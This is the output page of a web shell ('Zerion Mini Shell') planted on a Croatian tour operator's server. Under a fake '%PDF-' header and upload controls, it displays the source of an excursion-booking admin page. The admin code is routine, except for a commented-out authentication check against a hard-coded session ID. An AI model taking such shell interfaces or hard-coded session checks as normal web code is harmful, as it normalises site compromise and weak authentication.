%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/buggydubrovnik.com/prodaja/
Upload File :
Create Path :
Current File : //var/www/html/buggydubrovnik.com/prodaja/krizlet1.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" href="calendar.css" />
<script type="text/javascript">

function alertselected(selectobj){}
</script>
<script language="JavaScript" type="text/javascript" src="calendar_eu.js"></script>

<?php
exit;
//if($_COOKIE["SessionID"]!="123456789")  header( 'Location: index.php?greska=1' ) ;
;
?>
<link href="style.css" rel="stylesheet" type="text/css" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Poslovanje</title>

<script language="JavaScript" type="text/javascript" src="businesslayer.js"></script>
<script type="text/javascript">
//Parsiranje rezultata
function ParsirajSve(value)
{
	value = value.split("##");
	for (var i = 0; i < value.length; i++)
	{
	var tmp = value[i].split("==");
	value[tmp[0]] = tmp[1];
	}
	return value;
}


var po=0;var ut=0;var sr=0;var ce =0;var pe=0;var su=0;var ne=0;
var vari = "";
var svaMjKup=new Array();

var podaci=new Array();
//za prikaz stranice
function Prikazi()
{var formObj = document.forms['partner'];
	formObj.sPartneri.options.length = 0;
	document.getElementById('bpromijeni').style.display="none";
	document.getElementById('bunesi').style.display="inline";
document.getElementById("vrkupdiv").innerHTML="";
document.getElementById("mjkupdiv").innerHTML="";
	//Dohvati sve izlete
	MakeRequestLoadAllIzletTip();
	podaci = ParsirajSve(vari);	
	
	MakeRequestLoadAllProdajnoMjSVI();
	svaMjKup=ParsirajSve(vari);
	
	for(i=0;i<svaMjKup['brojac'];i++)
		{
			document.getElementById("mjkupdiv").innerHTML+='<div style="float:left; width:100%;height:20px;  margin-bottom:3px;">'+svaMjKup['naziv'+i]+'</div>';
		}
		
	for(i=0;i<svaMjKup['brojac'];i++)
		{
			document.getElementById("vrkupdiv").innerHTML+='<div style="float:left; width:100%;height:20px;margin-bottom:3px;"><input style="height:14px;width:100px;" name="vrkup'+i+'" type="text" /></div>';
		}

	
	
	var opt = document.createElement("option");document.getElementById("sPartneri").options.add(opt);
		opt.text = "ODABERITE IZLET";
        opt.value = "-1";
		
	var opt = document.createElement("option");document.getElementById("sPartneri").options.add(opt);
		opt.text = "----------------------------------------";
        opt.value = "-1";
		
	for(i=0;i<podaci['brojac'];i++)
	{
		var opt = document.createElement("option");
		document.getElementById("sPartneri").options.add(opt);
		opt.text = podaci['naziv'+i];
        opt.value = i;
	} 


//alert (vari);
	
}
var lvrkup=new Array();

var trenutniBr=0;

var idizlettip=0;

function PrikaziJednog()
{
	var selectElement1 = document.getElementById('sPartneri');
	var selectedValue1 = selectElement1[selectElement1.selectedIndex].value;
	rbr=selectedValue1;
	trenutniBr=rbr;
	document.unos.ned.checked=false;
	document.unos.pon.checked=false;
	document.unos.uto.checked=false;
	document.unos.sri.checked=false;
	document.unos.cet.checked=false;
	document.unos.pet.checked=false;
	document.unos.subo.checked=false;
	
document.getElementById("vrkupdiv").innerHTML="";
	document.getElementById('bunesi').style.display="none";
	document.getElementById('bpromijeni').style.display="inline";
	 document.unos.idizlet.value= podaci['idizlettip'+rbr];
	 //document.unos.idiz.value= podaci['idizlettip'+rbr];
	 document.unos.naziv.value = podaci['naziv'+rbr];
	 document.unos.cijena.value =podaci['cijena'+rbr];
	 
	 MakeRequestLoadPKIzletTipMjVrijemeIZ(podaci['idizlettip'+rbr]);
	 idizlettip=(podaci['idizlettip'+rbr]);
		lvrkup=ParsirajSve(vari);


	
		
		for(i=0;i<svaMjKup['brojac'];i++)
		{
			 document.getElementById("vrkupdiv").innerHTML+='<div style="float:left; width:100%;height:20px;margin-bottom:3px;"><input style="height:14px;width:100px;" name="vrkup'+i+'" value="'+lvrkup['vrijeme'+i]+'"  type="text" /></div>'; 
		}
			
	
	vrijednost = (podaci['datod'+rbr]).split("-"); 
	document.unos.pocetak.value=vrijednost[2]+'-'+vrijednost[1]+'-'+vrijednost[0];
	 
	vrijednost = (podaci['datdo'+rbr]).split("-"); 
	document.unos.kraj.value=vrijednost[2]+'-'+vrijednost[1]+'-'+vrijednost[0];
	
	if (((podaci['ned'+rbr])!=1)&&((podaci['pon'+rbr])!=1)&&((podaci['uto'+rbr])!=1)&&((podaci['sri'+rbr])!=1)&&((podaci['cet'+rbr])!=1)&&((podaci['pet'+rbr])!=1)&&((podaci['sub'+rbr])!=1)) 
	
	{document.getElementById('vanredno').style.display="none";document.unos.tjras.selectedIndex=1;}
	
	else {document.getElementById('vanredno').style.display="inline";document.unos.tjras.selectedIndex=0;}
	
	if ((podaci['ned'+rbr])==1)
	{
		document.unos.ned.checked=true;
		ne =1;
	}
	if ((podaci['pon'+rbr])==1)
	{
		document.unos.pon.checked=true;
		po=1;
	}
	if ((podaci['uto'+rbr])==1)
	{
		document.unos.uto.checked=true;
		ut=1;
	}
	if ((podaci['sri'+rbr])==1)
	{
		document.unos.sri.checked=true;
		sr=1;
	}
	if ((podaci['cet'+rbr])==1)
	{
		document.unos.cet.checked=true;
		ce=1;
	}
	if ((podaci['pet'+rbr])==1)
	{
		document.unos.pet.checked=true;
		pe=1;
	}
	if ((podaci['sub'+rbr])==1)
	{
		document.unos.subo.checked=true;
		su=1;
	}
	
	

}

function unesi()
{if(confirm("Unijeti izlet u bazu? ")){
	
//Jako zajebano!!	
	
	//unijeti izlet
	vrijednost = document.unos.pocetak.value.split("-"); 
	vrijednost1 = document.unos.kraj.value.split("-"); 
	po=0; ut=0;sr=0;ce =0;pe=0;su=0;ne=0;
	
	if (document.unos.subo.checked==true)
	{
		su=1;
	}
	if (document.unos.ned.checked==true)
	{
		ne=1;
	}
	if (document.unos.pon.checked==true)
	{
		po=1;
	}
	if (document.unos.uto.checked==true)
	{
		ut=1;
	}
	if (document.unos.sri.checked==true)
	{
		sr=1;
	}
	if (document.unos.cet.checked==true)
	{
		ce=1;
	}
	if (document.unos.pet.checked==true)
	{
		pe=1;
	}
	
	
	 MakeRequestInsertIzletTip( 0,  document.unos.naziv.value, vrijednost[2]+'-'+vrijednost[1]+'-'+vrijednost[0], vrijednost1[2]+'-'+vrijednost1[1]+'-'+vrijednost1[0],  document.unos.cijena.value, 1, po, ut, sr, ce, pe, su, ne, '', 0);
	idiz = vari;
	
	
	
		for(i=0;i<svaMjKup['brojac'];i++)
		{
			MakeRequestInsertIzletTipMjVrijeme( 0, idiz, svaMjKup['idprodajnomj'+i], document.unos.elements['vrkup'+i].value, 1);//alert(idiz);alert(svaMjKup['idprodajnomj'+i]);alert(document.unos.elements['vrkup'+i].value);
			
		}
	

	//unijeti izlet - vodici
	MakeRequestLoadAllZaposlenikVodic();
	
	var podaci1 = ParsirajSve(vari);
	for(i=0;i<podaci1['brojac'];i++){
		MakeRequestInsertIzletPogonTrosak( 0, podaci1['idzaposlenik'+i], idiz,0, 0, 0, 0, 2, "");
		
	}

	//unijeti izlet - prijevozi
	MakeRequestLoadAllVozilo();
	
		var podaci2 = ParsirajSve(vari);
	for(i=0;i<podaci2['brojac'];i++){
		MakeRequestInsertIzletPogonTrosak( 0, podaci2['idvozilo'+i], idiz, 0, 0, 0, 0, 1, "");
		//alert(vari);		
		}
		

   MakeRequestLoadAllProdajnoMjSVI();
   var podaci3 = ParsirajSve(vari);
	for(i=0;i<podaci3['brojac'];i++){
		MakeRequestInsertIzletTipMjVrijeme( 0, idiz, podaci2['idprodajnomj'+i] , '00:00', 1);
		//alert(vari);		
		}
	
	 MakeRequestLoadAllPartner();
   var podaci4 = ParsirajSve(vari);
	for(i=0;i<podaci4['brojac'];i++){
		MakeRequestInsertIzletPogonTrosak( 0, podaci4['idpartner'+i], idiz, 0, 0, 0, 0, 4, "");
		//alert(vari);		
		}
   
 

		

	//Sada treba unijeti datume
	
	//ako je odabran tjedni oblik , promijeniti IDizlettip
	if (document.unos.tjras[0].selected == true)
	 {
		 
		var odkad = new Date(vrijednost[2],vrijednost[1],vrijednost[0]); 
		var dokad = new Date(vrijednost1[2],vrijednost1[1],vrijednost1[0]);
		while(odkad <= dokad)
		{//alert(odkad.getDay());
			if (document.unos.ned.checked==true &&  odkad.getDay()==3)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.pon.checked==true &&  odkad.getDay()==4)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.uto.checked==true &&  odkad.getDay()==5)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.sri.checked==true &&  odkad.getDay()==6)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.cet.checked==true &&  odkad.getDay()==0)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.pet.checked==true &&  odkad.getDay()==1)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.subo.checked==true &&  odkad.getDay()==2)
			{
				 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
			}
			odkad.setDate(odkad.getDate() + 1);
			//alert(vari);
		}
	 }
 
	 
	//ako je odabran samo jedan dan
	else
	{
		
		vrijednost = document.unos.pocetak.value.split("-"); 
		var odkad = new Date(vrijednost[2],vrijednost[1],vrijednost[0]); 
		
		 MakeRequestInsertIzlet( 0, idiz, odkad.getFullYear()+'-'+odkad.getMonth()+'-'+odkad.getDate() , '', 0);
	}
	
		
	
//unijeti izlet-mjkupljenja-vrijeme
	//za svako mjesto kupljenja obaviti po jedan insert
	//MakeRequestInsertIzletTipMjVrijeme( 0, idizlettip, idprodajnomj, vrijeme, 1)
	
//	MakeRequestInsertPartner(0, `naziv`,`puniNaziv`,`oib`,`adresa`,`odgovornaOsoba, 0,0,'',0);
	alert("Zapis je unesen");
	Prikazi();}
}
	

function promijeni()
{
	if(confirm("Potvrditi promjene? ")){
		
		
	vrijednost = document.unos.pocetak.value.split("-"); 
	vrijednost1 = document.unos.kraj.value.split("-"); 
	
	po=0; ut=0;sr=0;ce =0;pe=0;su=0;ne=0;
	po1=0; ut1=0;sr1=0;ce1 =0;pe1=0;su1=0;ne1=0;
	
	if (document.unos.subo.checked==true)
	{
		su1=1;
	}
	if (document.unos.ned.checked==true)
	{
		ne1=1;
	}
	if (document.unos.pon.checked==true)
	{
		po1=1;
	}
	if (document.unos.uto.checked==true)
	{
		ut1=1;
	}
	if (document.unos.sri.checked==true)
	{
		sr1=1;
	}
	if (document.unos.cet.checked==true)
	{
		ce1=1;
	}
	if (document.unos.pet.checked==true)
	{
		pe1=1;
	}
	
		
		
			
	
	if(document.unos.tjras.selectedIndex==0)
	{
		var odkad = new Date(vrijednost[2],(parseInt(vrijednost[1])-1),vrijednost[0]); 
		var dokad = new Date(vrijednost1[2],(parseInt(vrijednost1[1])-1),vrijednost1[0]);
		
		
		while(odkad <= dokad)
		{ //alert (odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate()+"-->"+odkad.getDay());
		
			if (document.unos.ned.checked==true &&  odkad.getDay()==0 && ne==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.pon.checked==true &&  odkad.getDay()==1&& po==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.uto.checked==true &&  odkad.getDay()==2 && ut==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.sri.checked==true &&  odkad.getDay()==3 && sr==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.cet.checked==true &&  odkad.getDay()==4 && ce==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.pet.checked==true &&  odkad.getDay()==5 && pe==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			if (document.unos.subo.checked==true &&  odkad.getDay()==6 && su==0)
			{
				 MakeRequestInsertIzlet( 0, idizlettip, odkad.getFullYear()+'-'+(parseInt(odkad.getMonth())+1)+'-'+odkad.getDate() , '', 0);
			}
			odkad.setDate(odkad.getDate() + 1);
		}
	 }
	//ako je odabran samo jedan dan
	else
	{
		
		
		
	}
	
	

	
alert("Zapis je promijenjen");
	Prikazi();}
	
	
	
	
}



function IzbrisiIzletTip( rbr)
{
if(confirm("Potvrditi brisanje ? ")){		
 MakeRequestUpdateIzletTip( podaci['idizlettip'+rbr], podaci['naziv'+rbr], podaci['datod'+rbr], podaci['datdo'+rbr], podaci['cijena'+rbr], 2, podaci['pon'+rbr], podaci['uto'+rbr], podaci['sri'+rbr], podaci['cet'+rbr], podaci['pet'+rbr], podaci['sub'+rbr], podaci['ned'+rbr], '', 0);
}
 
}


</script>



</head>

<body  onload="Prikazi() ;" style=" margin:0 auto;">

<div id="gornjatraka">
<div style="float:right; margin-right:5px;padding-top:55px;">Prijavljeni ste kao <b>Ivan Ivušić</b></div>
</div>

<div id="main">
<div id="izborniklijevo">
<div class="izbornik"><img src="slike/home.png" style="vertical-align:middle"  /> <a href="start.php">&nbsp;Glavni izbornik</a>
</div>
<div class="izbornik"><img src="slike/filer.png" style="vertical-align:middle"  /> <a href="excursions.php">&nbsp;Izleti početna</a>
</div>

<div class="izbornik"><img src="slike/uizlet.png" style="vertical-align:middle"  /> <a href="krizlet.php">&nbsp;Kreiraj izlet</a>
</div>
<div class="izbornik"><img src="slike/pin.png" style="vertical-align:middle"  /> <a href="unmjkuplj.php">&nbsp;Mjesta kupljenja</a>
</div>
<div class="izbornik"><img src="slike/partner.png" style="vertical-align:middle"  /> <a href="unpart.php">&nbsp;Unos partnera</a>
</div>
<div class="izbornik"><img src="slike/bus.png" style="vertical-align:middle"  /> <a href="unvozila.php">&nbsp;Unos vozila</a>
</div>
<div class="izbornik"><img src="slike/vodic.png" style="vertical-align:middle"  /><a href="unvodica.php"> &nbsp;Unos vodiča</a>
</div>
<div class="izbornik"><img src="slike/wheel.png" style="vertical-align:middle"  /> <a href="unvozaca.php">&nbsp;Unos vozača</a>
</div>
</div>
<div id="tijelo"><div style="width:100%; margin-bottom:25px; font-size:18px; color:#333; text-decoration:underline; text-align:left; padding-top:20px;">KREIRAJ IZLET</div>

<div id="dropdown">

<form name="unos"><table>
<tr><td>Naziv :</td><td><input name="naziv" type="text" /></td></tr>
<tr><td>Cijena po osobi :</td><td><input name="cijena" type="text" /></td></tr>
<tr><td colspan="2" height="10px;"></td></tr>

<tr><td colspan="2" class="linija"></td></tr>

<tr><td colspan="2" height="10px;"></td></tr>
<tr><td></td><td><input name="idizlet" type="hidden" /></td></tr>
<tr><td></td><td><input name="idiz" type="hidden" /></td></tr>
<tr><td colspan="2"><select  id="tjras1" name="tjras" onChange="if (this.selectedIndex==1) getElementById('vanredno').style.display = 'none'; else getElementById('vanredno').style.display = 'inline';"  > <option>Tjedni raspored</option><option>Vanredno</option></select></td></tr><tr><td colspan="2" height="10px;"></td></tr>

<tr><td style="width:100px;"  > &nbsp;Početni datum :</td><td><input name="pocetak" type="text" /> <script type="text/javascript" >

						new tcal ({
							// form name
							'formname': 'unos',
							// input name
							'controlname': 'pocetak'
						});
						</script></td></tr>
<tr><td colspan="2"><div id="vanredno"><table><tr><td style="width:102px;"  >Krajnji datum :</td><td><input name="kraj" type="text" /> <script type="text/javascript" >

						new tcal ({
							// form name
							'formname': 'unos',
							// input name
							'controlname': 'kraj'
						});
						</script></td></tr>
                     <tr><td colspan="2" height="10px;"></td></tr>
   
<tr><td colspan="2">  <table><tr><td><input type="checkbox" name="pon" />Ponedjeljak</td><td> <input type="checkbox" name="uto" />Utorak </td><td><input type="checkbox" name="sri" />Srijeda</td></tr><tr><td colspan="4" height="5px"></td></tr><tr><td><input type="checkbox" name="cet" />Četvrtak</td><td> <input type="checkbox" name="pet" />Petak</td><td> <input type="checkbox" name="subo" />Subota</td><td> <input type="checkbox" name="ned" />Nedjelja</td></tr></table>  </td></tr></table></div></td></tr>

<tr><td colspan="2" height="20px;"></td></tr>
        <tr><td colspan="2" class="linija"></td></tr>


<tr><td colspan="2" height="20px;" align="center"></td></tr>

<tr><td width="110" ><b>Mjesto kupljenja</b></td><td> <b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vrijeme kupljenja</b> </td></tr>

<tr><td colspan="2" height="10px;" align="center"></td></tr>

<tr><td colspan="2" ><table><tr><td style="min-width:150px;">
        <div id="mjkupdiv"></div>
        </td>
        <td><div id="vrkupdiv"></div>
        </td></tr></table>
        </td></tr>

<tr><td colspan="2" height="10px;"></td></tr>

        <tr><td colspan="2" class="linija"></td></tr>


<tr><td colspan="2" height="20px;" align="center"></td></tr>
<tr><td align="center" colspan="2"><div id="bpromijeni"><img onclick="javascript:promijeni();" style="cursor:pointer;"  src="slike/spremi.jpg" /></div> &nbsp; <div id="bunesi"><img onclick="javascript:unesi();" style="cursor:pointer;"  src="slike/unesi.jpg" /></div></td></tr>
</table>
</form>

</div>
<div id="desno">&nbsp;<a href="javascript:brisipartnera();"><img src="slike/x.png" style="vertical-align:middle;" border="0"/></a>
    	<br /><form name="partner"><select id="sPartneri"  onchange="PrikaziJednog();"></select></form>
		<br /><br /><img src="slike/unosnovog.jpg" onclick="javascript:location.reload(true);" style="cursor:pointer;" /></div>


</div>
</div>


</body>
</html>

Zerion Mini Shell 1.0